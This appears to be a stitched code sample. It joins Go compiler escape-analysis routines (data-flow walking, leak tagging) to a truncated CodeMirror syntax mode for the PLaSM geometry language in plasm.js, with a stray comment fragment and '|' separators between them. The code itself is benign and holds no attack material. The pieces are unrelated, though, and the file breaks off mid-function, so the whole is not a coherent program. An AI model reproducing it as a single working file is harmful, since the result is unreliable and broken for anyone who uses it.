func (l *EscLocation) asHole() EscHole {
return EscHole{dst: l}
}
func (e *Escape) flow(k EscHole, src *EscLocation) {
dst := k.dst
if dst == &e.blankLoc {
return
}
if dst == src && k.derefs >= 0 { // dst = dst, dst = *dst, ...
return
}
if dst.escapes && k.derefs < 0 { // dst = &src
if Debug.m >= 2 || logopt.Enabled() {
pos := linestr(src.n.Pos)
if Debug.m >= 2 {
fmt.Printf("%s: %v escapes to heap:\n", pos, src.n)
}
explanation := e.explainFlow(pos, dst, src, k.derefs, k.notes, []*logopt.LoggedOpt{})
if logopt.Enabled() {
logopt.LogOpt(src.n.Pos, "escapes", "escape", e.curfn.funcname(), fmt.Sprintf("%v escapes to heap", src.n), explanation)
}
}
src.escapes = true
return
}
// TODO(mdempsky): Deduplicate edges?
dst.edges = append(dst.edges, EscEdge{src: src, derefs: k.derefs, notes: k.notes})
}
func (e *Escape) heapHole() EscHole { return e.heapLoc.asHole() }
func (e *Escape) discardHole() EscHole { return e.blankLoc.asHole() }
// walkAll computes the minimal dereferences between all pairs of
// locations.
func (e *Escape) walkAll() {
// We use a work queue to keep track of locations that we need
// to visit, and repeatedly walk until we reach a fixed point.
//
// We walk once from each location (including the heap), and
// then re-enqueue each location on its transition from
// transient->!transient and !escapes->escapes, which can each
// happen at most once. So we take Θ(len(e.allLocs)) walks.
// LIFO queue, has enough room for e.allLocs and e.heapLoc.
todo := make([]*EscLocation, 0, len(e.allLocs)+1)
enqueue := func(loc *EscLocation) {
if !loc.queued {
todo = append(todo, loc)
loc.queued = true
}
}
for _, loc := range e.allLocs {
enqueue(loc)
}
enqueue(&e.heapLoc)
var walkgen uint32
for len(todo) > 0 {
root := todo[len(todo)-1]
todo = todo[:len(todo)-1]
root.queued = false
walkgen++
e.walkOne(root, walkgen, enqueue)
}
}
// walkOne computes the minimal number of dereferences from root to
// all other locations.
func (e *Escape) walkOne(root *EscLocation, walkgen uint32, enqueue func(*EscLocation)) {
// The data flow graph has negative edges (from addressing
// operations), so we use the Bellman-Ford algorithm. However,
// we don't have to worry about infinite negative cycles since
// we bound intermediate dereference counts to 0.
root.walkgen = walkgen
root.derefs = 0
root.dst = nil
todo := []*EscLocation{root} // LIFO queue
for len(todo) > 0 {
l := todo[len(todo)-1]
todo = todo[:len(todo)-1]
base := l.derefs
// If l.derefs < 0, then l's address flows to root.
addressOf := base < 0
if addressOf {
// For a flow path like "root = &l; l = x",
// l's address flows to root, but x's does
// not. We recognize this by lower bounding
// base at 0.
base = 0
// If l's address flows to a non-transient
// location, then l can't be transiently
// allocated.
if !root.transient && l.transient {
l.transient = false
enqueue(l)
}
}
if e.outlives(root, l) {
// l's value flows to root. If l is a function
// parameter and root is the heap or a
// corresponding result parameter, then record
// that value flow for tagging the function
// later.
if l.isName(PPARAM) {
if (logopt.Enabled() || Debug.m >= 2) && !l.escapes {
if Debug.m >= 2 {
fmt.Printf("%s: parameter %v leaks to %s with derefs=%d:\n", linestr(l.n.Pos), l.n, e.explainLoc(root), base)
}
explanation := e.explainPath(root, l)
if logopt.Enabled() {
logopt.LogOpt(l.n.Pos, "leak", "escape", e.curfn.funcname(),
fmt.Sprintf("parameter %v leaks to %s with derefs=%d", l.n, e.explainLoc(root), base), explanation)
}
}
l.leakTo(root, base)
}
// If l's address flows somewhere that
// outlives it, then l needs to be heap
// allocated.
if addressOf && !l.escapes {
if logopt.Enabled() || Debug.m >= 2 {
if Debug.m >= 2 {
fmt.Printf("%s: %v escapes to heap:\n", linestr(l.n.Pos), l.n)
}
explanation := e.explainPath(root, l)
if logopt.Enabled() {
logopt.LogOpt(l.n.Pos, "escape", "escape", e.curfn.funcname(), fmt.Sprintf("%v escapes to heap", l.n), explanation)
}
}
l.escapes = true
enqueue(l)
continue
}
}
for i, edge := range l.edges {
if edge.src.escapes {
continue
}
derefs := base + edge.derefs
if edge.src.walkgen != walkgen || edge.src.derefs > derefs {
edge.src.walkgen = walkgen
edge.src.derefs = derefs
edge.src.dst = l
edge.src.dstEdgeIdx = i
todo = append(todo, edge.src)
}
}
}
}
// explainPath prints an explanation of how src flows to the walk root.
func (e *Escape) explainPath(root, src *EscLocation) []*logopt.LoggedOpt {
visited := make(map[*EscLocation]bool)
pos := linestr(src.n.Pos)
var explanation []*logopt.LoggedOpt
for {
// Prevent infinite loop.
if visited[src] {
if Debug.m >= 2 {
fmt.Printf("%s: warning: truncated explanation due to assignment cycle; see golang.org/issue/35518\n", pos)
}
break
}
visited[src] = true
dst := src.dst
edge := &dst.edges[src.dstEdgeIdx]
if edge.src != src {
Fatalf("path inconsistency: %v != %v", edge.src, src)
}
explanation = e.explainFlow(pos, dst, src, edge.derefs, edge.notes, explanation)
if dst == root {
break
}
src = dst
}
return explanation
}
func (e *Escape) explainFlow(pos string, dst, srcloc *EscLocation, derefs int, notes *EscNote, explanation []*logopt.LoggedOpt) []*logopt.LoggedOpt {
ops := "&"
if derefs >= 0 {
ops = strings.Repeat("*", derefs)
}
print := Debug.m >= 2
flow := fmt.Sprintf(" flow: %s = %s%v:", e.explainLoc(dst), ops, e.explainLoc(srcloc))
if print {
fmt.Printf("%s:%s\n", pos, flow)
}
if logopt.Enabled() {
var epos src.XPos
if notes != nil {
epos = notes.where.Pos
} else if srcloc != nil && srcloc.n != nil {
epos = srcloc.n.Pos
}
explanation = append(explanation, logopt.NewLoggedOpt(epos, "escflow", "escape", e.curfn.funcname(), flow))
}
for note := notes; note != nil; note = note.next {
if print {
fmt.Printf("%s: from %v (%v) at %s\n", pos, note.where, note.why, linestr(note.where.Pos))
}
if logopt.Enabled() {
explanation = append(explanation, logopt.NewLoggedOpt(note.where.Pos, "escflow", "escape", e.curfn.funcname(),
fmt.Sprintf(" from %v (%v)", note.where, note.why)))
}
}
return explanation
}
func (e *Escape) explainLoc(l *EscLocation) string {
if l == &e.heapLoc {
return "{heap}"
}
if l.n == nil {
// TODO(mdempsky): Omit entirely.
return "{temp}"
}
if l.n.Op == ONAME {
return fmt.Sprintf("%v", l.n)
}
return fmt.Sprintf("{storage for %v}", l.n)
}
// outlives reports whether values stored in l may survive beyond
// other's lifetime if stack allocated.
func (e *Escape) outlives(l, other *EscLocation) bool {
// The heap outlives everything.
if l.escapes {
return true
}
// We don't know what callers do with returned values, so
// pessimistically we need to assume they flow to the heap and
// outlive everything too.
if l.isName(PPARAMOUT) {
// Exception: Directly called closures can return
// locations allocated outside of them without forcing
// them to the heap. For example:
//
// var u int // okay to stack allocate
// *(func() *int { return &u }()) = 42
if containsClosure(other.curfn, l.curfn) && l.curfn.Func.Closure.Func.Top&ctxCallee != 0 {
return false
}
return true
}
// If l and other are within the same function, then l
// outlives other if it was declared outside other's loop
// scope. For example:
//
// var l *int
// for {
// l = new(int)
// }
if l.curfn == other.curfn && l.loopDepth < other.loopDepth {
return true
}
// If other is declared within a child closure of where l is
// declared, then l outlives it. For example:
//
// var l *int
// func() {
// l = new(int)
// }
if containsClosure(l.curfn, other.curfn) {
return true
}
return false
}
// containsClosure reports whether c is a closure contained within f.
func containsClosure(f, c *Node) bool {
if f.Op != ODCLFUNC || c.Op != ODCLFUNC {
Fatalf("bad containsClosure: %v, %v", f, c)
}
// Common case.
if f == c {
return false
}
// Closures within function Foo are named like "Foo.funcN..."
// TODO(mdempsky): Better way to recognize this.
fn := f.Func.Nname.Sym.Name
cn := c.Func.Nname.Sym.Name
return len(cn) > len(fn) && cn[:len(fn)] == fn && cn[len(fn)] == '.'
}
// leak records that parameter l leaks to sink.
func (l *EscLocation) leakTo(sink *EscLocation, derefs int) {
// If sink is a result parameter that doesn't escape (#44614)
// and we can fit return bits into the escape analysis tag,
// then record as a result leak.
if !sink.escapes && sink.isName(PPARAMOUT) && sink.curfn == l.curfn {
// TODO(mdempsky): Eliminate dependency on Vargen here.
ri := int(sink.n.Name.Vargen) - 1
if ri < numEscResults {
// Leak to result parameter.
l.paramEsc.AddResult(ri, derefs)
return
}
}
// Otherwise, record as heap leak.
l.paramEsc.AddHeap(derefs)
}
func (e *Escape) finish(fns []*Node) {
// Record parameter tags for package export data.
for _, fn := range fns {
fn.Esc = EscFuncTagged
narg := 0
for _, fs := range &types.RecvsParams {
for _, f := range fs(fn.Type).Fields().Slice() {
narg++
f.Note = e.paramTag(fn, narg, f)
}
}
}
for _, loc := range e.allLocs {
n := loc.n
if n == nil {
continue
}
n.SetOpt(nil)
// Update n.Esc based on escape analysis results.
if loc.escapes {
if n.Op != ONAME {
if Debug.m != 0 {
Warnl(n.Pos, "%S escapes to heap", n)
}
if logopt.Enabled() {
logopt.LogOpt(n.Pos, "escape", "escape", e.curfn.funcname())
}
}
n.Esc = EscHeap
addrescapes(n)
} else {
if Debug.m != 0 && n.Op != ONAME {
Warnl(n.Pos, "%S does not escape", n)
}
n.Esc = EscNone
if loc.transient {
n.SetTransient(true)
}
}
}
}
func (l *EscLocation) isName(c Class) bool {
return l.n != nil && l.n.Op == ONAME && l.n.Class() == c
}
const numEscResults = 7
// An EscLeaks represents a set of assignment flows from a parameter
// to the heap or to any of its function's (first numEscResults)
// result parameters.
type EscLeaks [1 + numEscResults]uint8
// Empty reports whether l is an empty set (i.e., no assignment flows).
func (l EscLeaks) Empty() bool { return l == EscLeaks{} }
// Heap returns the minimum deref count of any assignment flow from l
// to the heap. If no such flows exist, Heap returns -1.
func (l EscLeaks) Heap() int { return l.get(0) }
// Result returns the minimum deref count of any assignment flow from
// l to its function's i'th result parameter. If no such flows exist,
// Result returns -1.
func (l EscLeaks) Result(i int) int { return l.get(1 + i) }
// AddHeap adds an assignment flow from l to the heap.
func (l *EscLeaks) AddHeap(derefs int) { l.add(0, derefs) }
// AddResult adds an assignment flow from l to its function's i'th
// result parameter.
func (l *EscLeaks) AddResult(i, derefs int) { l.add(1+i, derefs) }
func (l *EscLeaks) setResult(i, derefs int) { l.set(1+i, derefs) }
func (l EscLeaks) get(i int) int { return int(l[i]) - 1 }
func (l *EscLeaks) add(i, derefs int) {
if old := l.get(i); old < 0 || derefs < old {
l.set(i, derefs)
}
}
func (l *EscLeaks) set(i, derefs int) {
v := derefs + 1
if v < 0 {
Fatalf("invalid derefs count: %v", derefs)
}
if v > math.MaxUint8 {
v = math.MaxUint8
}
l[i] = uint8(v)
}
// Optimize removes result flow paths that are equal in length or
// longer than the shortest heap flow path.
func (l *EscLeaks) Optimize() {
// If we have a path to the heap, then there's no use in
// keeping equal or longer paths elsewhere.
if x := l.Heap(); x >= 0 {
for i := 0; i < numEscResults; i++ {
if l.Result(i) >= x {
l.setResult(i, -1)
}
}
}
}
var leakTagCache = map[EscLeaks]string{}
// Encode converts l into a binary string for export data.
func (l EscLeaks) Encode() string {
if l.Heap() == 0 {
// Space optimization: empty string encodes more
// efficiently in export data.
return ""
}
if s, ok := leakTagCache[l]; ok {
return s
}
n := len(l)
for n > 0 && l[n-1] == 0 {
n--
}
s := "esc:" + string(l[:n])
leakTagCache[l] = s
return s
}
// ParseLeaks parses a binary string representing an EscLeaks.
func ParseLeaks(s string) EscLeaks {
var l EscLeaks
if !strings.HasPrefix(s, "esc:") {
l.AddHeap(0)
return l
}
copy(l[:], s[4:])
return l
} | // if !x {
// e.value(k, n.Left) |
plasm.js | CodeMirror.defineMode("plasm", function(conf, parserConf) {
var ERRORCLASS = 'error';
function wordRegexp(words) {
return new RegExp("^((" + words.join(")|(") + "))\\b");
}
var singleOperators = new RegExp("^[\\+\\-\\*/%&|\\^~<>!]");
var singleDelimiters = new RegExp('^[\\(\\)\\[\\]\\{\\}@,:`=;\\.]');
var doubleOperators = new RegExp("^((==)|(!=)|(<=)|(>=)|(<>)|(<<)|(>>)|(//)|(\\*\\*))");
var doubleDelimiters = new RegExp("^((\\+=)|(\\-=)|(\\*=)|(%=)|(/=)|(&=)|(\\|=)|(\\^=))");
var tripleDelimiters = new RegExp("^((//=)|(>>=)|(<<=)|(\\*\\*=))");
var identifiers = new RegExp("^[_A-Za-z][_A-Za-z0-9]*");
var assignOperators = new RegExp("^\\W*((=)|(\\+=)|(-=)|(/=)|(\\*=))");
var funcIdentifiers = new RegExp("^[_A-Z][_A-Z0-9]*$");
var wordOperators = wordRegexp(['and', 'or', 'not', 'is', 'in']);
var commonkeywords = ['as', 'assert', 'break', 'class', 'continue',
'def', 'del', 'elif', 'else', 'except', 'finally',
'for', 'from', 'global', 'if', 'import',
'lambda', 'pass', 'raise', 'return',
'try', 'while', 'with', 'yield'];
var commonBuiltins = ['abs', 'all', 'any', 'bin', 'bool', 'bytearray', 'callable', 'chr',
'classmethod', 'compile', 'complex', 'delattr', 'dict', 'dir', 'divmod',
'enumerate', 'eval', 'filter', 'float', 'format', 'frozenset',
'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id',
'input', 'int', 'isinstance', 'issubclass', 'iter', 'len',
'list', 'locals', 'map', 'max', 'memoryview', 'min', 'next',
'object', 'oct', 'open', 'ord', 'pow', 'property', 'range',
'repr', 'reversed', 'round', 'set', 'setattr', 'slice',
'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple',
'type', 'vars', 'zip', '__import__', 'NotImplemented',
'Ellipsis', '__debug__'];
var customGroups = [
[
'CUBE', 'SQUARE', 'SQUARE3D', 'BOX', 'BRICK', 'RECTANGLE', 'RECTANGLE3D', 'HEXAHEDRON', 'SIMPLEX', 'CHULL', 'INTERVALS', 'RING', 'TUBE', 'RING3D', 'CIRCLE', 'CIRCLE3D', 'ELLIPSE', 'ARC', 'ARC3D', 'CYLINDER', 'CYL', 'SPHERE', 'TORUS', 'DONUT', 'ELBOW', 'CONE', 'PYRAMID', 'TCONE', 'TRUNCONE', 'DODECAHEDRON', 'ICOSAHEDRON', 'TETRAHEDRON', 'TRIANGLE', 'TRIANGLE3D', 'QUAD', 'QUADRILATERAL', 'BEZIER1', 'BEZIER2', 'BEZIER3', 'COONSPATCH', 'RULEDSURFACE', 'PROFILEPRODSURFACE', 'ROTATIONALSURFACE', 'ROSURFACE', 'ROSURF', 'ROTATIONALSOLID', 'ROSOLID', 'ROSOL', 'ROTATIONALSHELL', 'ROSHELL', 'CYLINDRICALSURFACE', 'CYSURFACE', 'CYSURF', 'CONICALSURFACE', 'COSURFACE', 'COSURF', 'CUBICHERMITE1', 'CUBICHERMITE2', 'CUBICHERMITE3', 'STAR', 'PRISM', 'REFDOMAIN', 'REFDOMAIN3D', 'UNITSQUARE', 'UNITCUBE', 'TANGRAM1', 'TANGRAM2', 'TANGRAM3', 'TANGRAM4', 'TANGRAM5', 'TANGRAM6', 'TANGRAM7', 'POINT', 'SHELL', 'OCTAHEDRON', 'KRYCHLE', 'KOSTKA', 'SZESCIAN', 'WUERFEL', 'WURFEL', 'CUBO', 'CTVEREC', 'KWADRAT', 'QUADRAT', 'CUADRADO', 'QUADRATO', 'CARRE', 'KVADR', 'CIHLA', 'PUDLO', 'CEGLA', 'KASTEN', 'SCHACHTEL', 'LADRILLO', 'CAJA', 'CUADRO', 'COTTO', 'SCATOLA', 'MATTONE', 'LATERIZIO', 'PARALELLEPIPEDO', 'BRIQUE', 'BOITE', 'RECT', 'OBDELNIK', 'PROSTOKAT', 'RECHTECK', 'RECTANGULO', 'RETTANGOLO', 'HEX', 'HEXAEDR', 'HEXAEDER', 'HEXAEDRO', 'ESAEDRO', 'HEXAEDRE', 'CONVEXHULL', 'CONVEX', 'CH', 'SPAN', 'KONVEXNIOBAL', 'KONVEX', 'OBAL', 'KOBAL', 'OTOCZKAWYPUKLA', 'OTOCZKA', 'HUELLE', 'HULLE', 'SPANNE', 'CASCO', 'CONVEXA', 'CONVESSO', 'SPANNA', 'CONVEXE', 'ENVELOPPE', 'DUREE', 'DIVISION', 'DELENI', 'INTERVALY', 'DZIELENIE', 'INTERWALY', 'INTERVALLE', 'AUFTEILEN', 'AUFSPALTEN', 'DIVISIONE', 'TRUBICE', 'TRUBKA', 'TUBA', 'ROURA', 'RURA', 'ROHR', 'TUBO', 'KRUH', 'KRUZNICE', 'KOLO', 'KRAG', 'OKRAG', 'KREIS', 'CIRCULO', 'CERCHIO', 'CERCLE', 'ROND', 'VALEC', 'ZYLINDER', 'ZYL', 'CILINDRO', 'CIL', 'CYLINDRE', 'KOULE', 'KULA', 'SFERA', 'KUGEL', 'ESFERA', 'TORO', 'TORE', 'KUZEL', 'STOZEK', 'KEGEL', 'CONO', 'KOMOLYKUZEL', 'KKUZEL', 'SCIETYSTOZEK', 'SSTOZEK', 'KEGELSTUMPF', 'KSTUMPF', 'CONOTRUNCADO', 'TRUNCONO', 'TCONO', 'TRONCONO', 'TRONCONE', 'DODEKAEDR', 'DVANACTISTEN', 'DWUNASTOSCIAN', 'DODEKAEDER', 'DODECAEDRO', 'DODECAEDRE', 'IKOSAEDR', 'DVACETISTEN', 'DWUDZIESTOSCIAN', 'IKOSAEDER', 'ICOSAEDRO', 'ICOSAEDRE', 'TET', 'TETRAEDR', 'CTYRSTEN', 'CZWOROBOK', 'CZWOROSCIAN', 'TETRAEDER', 'TETRAEDRO', 'TETRAEDRE', 'TROJUHELNIK', 'TROJKAT', 'DREIECK', 'TRIANGULO', 'TRIANGOLO', 'RUSURFACE', 'RUSURF', 'RUSU', 'PPSURFACE', 'PPSURF', 'PPSU', 'ROSU', 'ROTSOLID', 'ROTSHELL', 'CYSU', 'COSU', 'HRANOL', 'PRYZMA', 'PRYZMAT', 'PRISMA', 'PRISME', 'OKTAEDR', 'OCTAEDER', 'OCTAEDRO', 'EMPTY', 'EMPTYLIST'
],
[
'MOVE', 'M', 'SCALE', 'S', 'ROTATERAD', 'ROTATE', 'R', 'FLIP', 'TRANSLATE', 'T', 'SHIFT', 'POSUN', 'POSUNUTI', 'PRZENIES', 'PRZESUN', 'BEWEGE', 'BEWEGEN', 'BEWEGUNG', 'VERSCHIEBUNG', 'VERSCHIEBEN', 'VERSCHIEBE', 'MOVER', 'MUEVA', 'MUEVE', 'MUOVERE', 'MUOVI', 'SPOSTARE', 'SPOSTA', 'DEPLACER', 'DEPLACE', 'SKALUJ', 'SKALOVANI', 'PRZESKALUJ', 'SKALIERE', 'SKALIEREN', 'ESCALA', 'ESCALAR', 'SCALA', 'SCALARE', 'ECHELLE', 'REDIMENSIONNER', 'RRAD', 'OTOCRAD', 'OTOCENIRAD', 'ROTACERAD', 'ROTUJRAD', 'OBROCRAD', 'DREHERAD', 'DREHENRAD', 'DREHUNGRAD', 'ROTIERERAD', 'ROTIERENRAD', 'ROTIERUNGRAD', 'GIRARAD', 'ROTARAD', 'GIRARRAD', 'ROTARRAD', 'RUOTARERAD', 'RUOTARAD', 'TOURNERRAD', 'TOURNERAD', 'ROTATEDEG', 'RDEG', 'OTOC', 'OTOCENI', 'ROTACE', 'ROTUJ', 'OBROC', 'DREHE', 'DREHEN', 'DREHUNG', 'ROTIERE', 'ROTIEREN', 'ROTIERUNG', 'GIRA', 'ROTA', 'GIRAR', 'ROTAR', 'RUOTARE', 'RUOTA', 'TOURNER', 'TOURNE'
],
[
'ERASE', 'SPLIT', 'COPY', 'WELD', 'UNION', 'STRUCT', 'INTERSECTION', 'I', 'SUBTRACT', 'DIFFERENCE', 'DIFF', 'XOR', 'JOIN', 'PRODUCT', 'POWER', 'GRID', 'TOP', 'BOTTOM', 'LEFT', 'RIGHT', 'FRONT', 'REAR', 'MAP', 'MIRROR', 'SOLIDIFY', 'EXTRUDE', 'REVOLVE', 'SPIRAL', 'E', 'KOPIE', 'KOPIA', 'COPIA', 'COPIE', 'SPOJ', 'SPOJIT', 'SPOJENI', 'STRUKTURA', 'STRUKTUR', 'VERBINDE', 'ESTRUCTURA', 'ESTRUCT', 'STRUTTURA', 'GLUE', 'U', 'SUM', 'SJEDNOCENI', 'SOUCET', 'SECTI', 'SECIST', 'SUMA', 'UNIA', 'VEREINIGE', 'VEREINIGUNG', 'SUMME', 'SOMMA', 'UNIONE', 'SOMME', 'PRUNIK', 'PRZECIECIE', 'PRZETNIJ', 'DURCHSCHNITT', 'SCHNITT', 'SCHNEIDE', 'INTERSECCION', 'INTERSEZIONE', 'INTERSECA', 'MINUS', 'ODECTI', 'ODECIST', 'ODEJMIJ', 'ABZIEHE', 'SUBTRAHIERE', 'SUSTRAER', 'SUSTRAE', 'SOTTRARRE', 'SOTTRAI', 'SOUSTRAIRE', 'SOUSTRAIS', 'D', 'ROZDIL', 'ROZNICA', 'DIFFERENZ', 'DIFERENCIA', 'DIF', 'MOCNINA', 'PRODUKT', 'SOUCIN', 'UMOCNIT', 'UMOCNI', 'MOC', 'ILOCZYN', 'LEISTUNG', 'POTENCIA', 'PRODUCTO', 'POTENZA', 'PUISSANCE', 'PRODUIT', 'QUOTE', 'SIT', 'MRIZ', 'SIATKA', 'GITTER', 'NETZ', 'REJILLA', 'CUADRICULA', 'GRIGLIA', 'GRILLE', 'EXT', 'APPEND'
],
[
'SHOW', 'SIZEX', 'SIZEY', 'SIZEZ', 'SIZE', 'MINX', 'MINY', 'MINZ', 'MAXX', 'MAXY', 'MAXZ', 'GETDIM', 'COLOR', 'C', 'MATERIAL', 'TEXTURE', 'IS2D', 'IS3D', 'EMPTYSET', 'SUBSET', 'DISJOINT', 'HASBOX2D', 'HASNTBOX2D', 'ISINBOX2D', 'HASBOX3D', 'HASNTBOX3D', 'ISINBOX3D', 'SIZETEST2D', 'SIZETEST3D', 'BBTEST2D', 'BBTEST3D', 'SIZEMATCH2D', 'SIZEMATCH3D', 'POSITIONTEST2D', 'POSITIONTEST3D', 'PRINTSIZE', 'EXTREMA', 'EXTREMS', 'EXTREMES', 'VALIDATE', 'UKAZ', 'POKAZ', 'ZEIGE', 'MOSTRA', 'MONTRE', 'MUESTRA', 'VELIKOST', 'ROZMER', 'DELKA', 'ROZMIAR', 'GROESSE', 'GROSSE', 'LAENGE', 'LANGE', 'TAMANO', 'LONGITUD', 'TAGLIA', 'LUNGHEZZA', 'TAILLE', 'LONGUEUR', 'BARVA', 'OBARVI', 'OBARVIT', 'KOLOR', 'FARBE', 'COLORE', 'COULEUR'
],
[
'MANGO', 'BLACKBERRY', 'PAPAYA', 'HONEY', 'KETCHUP', 'MUSTARD', 'GRAY', 'GREY', 'SAND', 'LIGHTGREEN', 'GREEN', 'DARKGREEN', 'BLACK', 'LIGHTBLUE', 'BLUE', 'DARKBLUE', 'LIGHTBROWN', 'BROWN', 'DARKBROWN', 'LIME', 'MAROON', 'OLIVE', 'TEAL', 'NAVY', 'NAVYBLUE', 'SKYBLUE', 'CRIMSON', 'CORAL', 'SALMON', 'KHAKI', 'TURQUOISE', 'ORCHID', 'BEIGE', 'WHEAT', 'LIGHTCYAN', 'CYAN', 'DARKCYAN', 'PINK', 'LIGHTMAGENTA', 'MAGENTA', 'DARKMAGENTA', 'ORANGE', 'DARKORANGE', 'PURPLE', 'INDIGO', 'VIOLET', 'WHITE', 'LIGHTRED', 'RED', 'DARKRED', 'YELLOW', 'DARKYELLOW', 'STRAWBERRY', 'RASPBERRY', 'BLUEBERRY', 'PEACH', 'BANANA', 'MINT', 'VANILLA', 'LEMON', 'CHOCOLATE', 'CANDY', 'BRASS', 'COPPER', 'BRONZE', 'SILVER', 'GOLD', 'WOOD', 'STEEL', 'SEDA', 'SEDIVA', 'ZELENA', 'CERNA', 'MODRA', 'HNEDA', 'ORANZOVA', 'RUZOVA', 'FIALOVA', 'BILA', 'CERVENA', 'RUDA', 'ZLUTA', 'OCEL', 'OCELOVA', 'MOSAZ', 'MOSAZNA', 'MED', 'MEDENA', 'BRONZ', 'BRONZOVA', 'STRIBRO', 'STRIBRNA', 'ZLATO', 'ZLATA', 'SZARY', 'SIWY', 'ZIELONY', 'CZARNY', 'NIEBIESKI', 'BRAZOWY', 'POMARANCZOVY', 'ROZOWY', 'PURPUROWY', 'BIALY', 'CZERWONY', 'ZOLTY', 'STAL', 'STALOWY', 'MOSIADZ', 'MIEDZ', 'BRAZ', 'SREBRO', 'SREBRNY', 'ZLOTO', 'ZLOTY', 'GRAU', 'GRUEN', 'GRUN', 'SCHWARZ', 'BLAU', 'BRAUN', 'ROSA', 'LILA', 'WEISS', 'ROT', 'GELB', 'STAHL', 'MESSING', 'KUPFER', 'SILBER', 'GRIS', 'VERDE', 'NEGRO', 'NEGRA', 'AZUL', 'MARRON', 'CIAN', 'ROSO', 'NARANJA', 'PURPURO', 'PURPURA', 'BLANCO', 'BLANCA', 'ROJO', 'ROJA', 'AMARILLO', 'AMARILLA', 'ACERO', 'LATON', 'COBRE', 'BRONCE', 'PLATA', 'ORO', 'GRIGIO', 'NERO', 'NERA', 'AZZURRO', 'AZZURRA', 'MARRONE', 'ROSOLARE', 'CIANO', 'DENTELLARE', 'ARANCIONE', 'ARANCIO', 'ARANCIA', 'VIOLA', 'PORPORA', 'BIANCO', 'BIANCA', 'ROSSO', 'ROSSA', 'GIALLO', 'GIALLA', 'ACCIAIO', 'OTTONE', 'RAME', 'BRONZO', 'ARGENTO', 'VERT', 'NOIR', 'BLEU', 'BRUN', 'ROSE', 'POURPRE', 'BLANC', 'ROUGE', 'JAUNE', 'ACIER', 'LAITON', 'CUIVRE', 'ARGENT', 'OR'
],
['X'],
['Y'],
['Z']
];
var py2 = {'builtins': ['apply', 'basestring', 'buffer', 'cmp', 'coerce', 'execfile',
'file', 'intern', 'long', 'raw_input', 'reduce', 'reload',
'unichr', 'unicode', 'xrange', 'False', 'True', 'None'],
'keywords': ['exec', 'print']};
var py3 = {'builtins': ['ascii', 'bytes', 'exec', 'print'],
'keywords': ['nonlocal', 'False', 'True', 'None']};
if (!!parserConf.version && parseInt(parserConf.version, 10) === 3) {
commonkeywords = commonkeywords.concat(py3.keywords);
commonBuiltins = commonBuiltins.concat(py3.builtins);
var stringPrefixes = new RegExp("^(([rb]|(br))?('{3}|\"{3}|['\"]))", "i");
} else {
commonkeywords = commonkeywords.concat(py2.keywords);
commonBuiltins = commonBuiltins.concat(py2.builtins);
var stringPrefixes = new RegExp("^(([rub]|(ur)|(br))?('{3}|\"{3}|['\"]))", "i");
}
var keywords = wordRegexp(commonkeywords);
var builtins = wordRegexp(commonBuiltins);
var customKeywords = [];
for (var i=0; i<customGroups.length; i++) {
customKeywords.push(wordRegexp(customGroups[i]));
}
var indentInfo = null;
// tokenizers
function tokenBase(stream, state) {
// Handle scope changes
if (stream.sol()) {
var scopeOffset = state.scopes[0].offset;
if (stream.eatSpace()) {
var lineOffset = stream.indentation();
if (lineOffset > scopeOffset) {
indentInfo = 'indent';
} else if (lineOffset < scopeOffset) {
indentInfo = 'dedent';
}
return null;
} else {
if (scopeOffset > 0) {
dedent(stream, state);
}
}
}
if (stream.eatSpace()) {
return null;
}
var ch = stream.peek();
// Handle Comments
if (ch === '#') {
stream.skipToEnd();
return 'comment';
}
// Handle Number Literals
if (stream.match(/^[0-9\.]/, false)) {
var floatLiteral = false;
// Floats
if (stream.match(/^\d*\.\d+(e[\+\-]?\d+)?/i)) { floatLiteral = true; }
if (stream.match(/^\d+\.\d*/)) { floatLiteral = true; }
if (stream.match(/^\.\d+/)) { floatLiteral = true; }
if (floatLiteral) {
// Float literals may be "imaginary"
stream.eat(/J/i);
return 'number';
}
// Integers
var intLiteral = false;
// Hex
if (stream.match(/^0x[0-9a-f]+/i)) { intLiteral = true; }
// Binary
if (stream.match(/^0b[01]+/i)) { intLiteral = true; }
// Octal
if (stream.match(/^0o[0-7]+/i)) { intLiteral = true; }
// Decimal
if (stream.match(/^[1-9]\d*(e[\+\-]?\d+)?/)) {
// Decimal literals may be "imaginary"
stream.eat(/J/i);
// TODO - Can you have imaginary longs?
intLiteral = true;
}
// Zero by itself with no other piece of number.
if (stream.match(/^0(?![\dx])/i)) { intLiteral = true; }
if (intLiteral) {
// Integer literals may be "long"
stream.eat(/L/i);
return 'number';
}
}
// Handle Strings
if (stream.match(stringPrefixes)) {
state.tokenize = tokenStringFactory(stream.current());
return state.tokenize(stream, state);
}
// Handle operators and Delimiters
if (stream.match(tripleDelimiters) || stream.match(doubleDelimiters)) {
return null;
}
if (stream.match(doubleOperators)
|| stream.match(singleOperators)
|| stream.match(wordOperators)) {
return 'operator';
}
if (stream.match(singleDelimiters)) {
return null;
}
if (stream.match(keywords)) {
return 'keyword';
} | if (stream.match(builtins)) {
return 'builtin';
}
for (var i=0; i<customKeywords.length; i++) {
if (stream.match(customKeywords[i])) {
if (stream.match(assignOperators)) {
return ERRORCLASS;
}
else {
return 'plasm-custom'+i;
}
}
}
var variable = stream.match(identifiers);
if (variable) {
if (stream.match(assignOperators)) {
if (funcIdentifiers.test(variable)){
return ERRORCLASS;
}
}
return 'variable';
}
// Handle non-detected items
stream.next();
return ERRORCLASS;
}
function tokenStringFactory(delimiter) {
while ('rub'.indexOf(delimiter.charAt(0).toLowerCase()) >= 0) {
delimiter = delimiter.substr(1);
}
var singleline = delimiter.length == 1;
var OUTCLASS = 'string';
return function tokenString(stream, state) {
while (!stream.eol()) {
stream.eatWhile(/[^'"\\]/);
if (stream.eat('\\')) {
stream.next();
if (singleline && stream.eol()) {
return OUTCLASS;
}
} else if (stream.match(delimiter)) {
state.tokenize = tokenBase;
return OUTCLASS;
} else {
stream.eat(/['"]/);
}
}
if (singleline) {
if (parserConf.singleLineStringErrors) {
return ERRORCLASS;
} else {
state.tokenize = tokenBase;
}
}
return OUTCLASS;
};
}
function indent(stream, state, type) {
type = type || 'py';
var indentUnit = 0;
if (type === 'py') {
if (state.scopes[0].type !== 'py') {
state.scopes[0].offset = stream.indentation();
return;
}
for (var i = 0; i < state.scopes.length; ++i) {
if (state.scopes[i].type === 'py') {
indentUnit = state.scopes[i].offset + conf.indentUnit;
break;
}
}
} else {
indentUnit = stream.column() + stream.current().length;
}
state.scopes.unshift({
offset: indentUnit,
type: type
});
}
function dedent(stream, state, type) {
type = type || 'py';
